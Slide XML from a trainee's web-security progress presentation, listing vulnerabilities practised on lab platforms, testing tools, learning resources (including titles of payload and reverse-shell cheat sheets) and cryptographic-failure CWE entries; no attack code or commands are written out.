              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Petshop Pro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>3 / 3</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repository for my notes and note taking.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="593" name="Google Shape;593;p9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Originally I have been writing word documents of my process of going through pages and objects I am finding vulnerabilities for. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>I found my notes hard to find when I was adding more notes and it has been overdue for me to make a place to keep all my notes. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>I decided I would set up a folder that would be similar to the GitHub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>OWASP Web Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t> Guide (WSTG)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> as that guide was easy to navigate through. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>It’s also good to be able to back it up to GitHub if I need my notes on another computer.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of the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> first 4 weeks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="599" name="Google Shape;599;p9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The fundamentals of OWASP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317182" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>How to use the testing guide</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317182" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>I learned a range of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>vulnerabilities with practical experience: XSS (reflected, stored, DOM), SQLi (including blind SQLi), Content-Security-Policy ByPass, Weak Session IDs, Command Injection, File Inclusion/Directory Traversal, File Upload Vulnerabilities, Cross-site Request Forgery, Brute Force Attacks, Open HTTP Redirect, and more.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317182" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>I used a range of hacking platforms: metasploitable, DVWA, Mutillidae, BugBountyHunter, Hacker101. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317182" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>List of books (special mentions): Bug Bounty Bootcamp - Vickie Li, Web Security For Developers - Malcolm McDonald, and many more I need to look into further.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317182" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Tools: OWASP Zap, Burp Suite Inspector, Repeater, Turbo Intruder, sqlmap, feroxbuster, gobuster.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317182" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Improved skills in finding resources and note taking.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317182" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Writing reports with markdown (.md) language and organising me notes with git.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Resources</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="605" name="Google Shape;605;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="4195800" cy="373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hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>OWASP Testing Guide</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>DVWA</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>HackSplaining</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Hacker101 CTF</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>BugBountyHunter</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>PortSwigger Academy</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Calls with my mentor</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>CTF tutorials if I am spending too much time. Great for learning easier techniques for finding vulnerabilities.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="606" name="Google Shape;606;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1017725"/>
            <a:ext cx="4335600" cy="373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solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>XSS Filter Evasion and WAF Bypassing Tactics </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>xss-owasp-cheatsheet </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId12">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>htmlspecialchars </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>DOM Based Cross Site Scripting </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Content Security Policy Reference</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId15">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Hacking with Netcat part 2: Bind and reverse shells</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId16">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Command-injection-payload-list</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId17">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Path_Travelsal_Payload_List</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId18">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Reverse Shell Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId19">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>File upload bypass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next 4 weeks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="612" name="Google Shape;612;p9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Next week I have been projected to begin learning malware analysis which I am excited for.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Focus more on reports for the presentation.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Adding more notes to my git folder.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>And any suggested improvements.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CWEs and Preventions (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Cryptographic Failures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="Google Shape;124;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="3542400" cy="379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358"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="585"/>
              <a:t>CWEs</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-261 Weak Encoding for Password</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-296 Improper Following of a Certificate's Chain of Trust</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-310 Cryptographic Issues</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-319 Cleartext Transmission of Sensitive Information</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-321 Use of Hard-coded Cryptographic Key</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-322 Key Exchange without Entity Authentication</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-323 Reusing a Nonce, Key Pair in Encryption</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-324 Use of a Key Past its Expiration Date</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-325 Missing Required Cryptographic Step</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-326 Inadequate Encryption Strength</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-327 Use of a Broken or Risky Cryptographic Algorithm</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-328 Reversible One-Way Hash</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-329 Not Using a Random IV with CBC Mode</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
              <a:t>CWE-330 Use of Insufficiently Random Values</a:t>
            </a:r>
            <a:endParaRPr sz="585"/>
          </a:p>
          <a:p>
            <a:pPr indent="-265747" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="585"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="585"/>
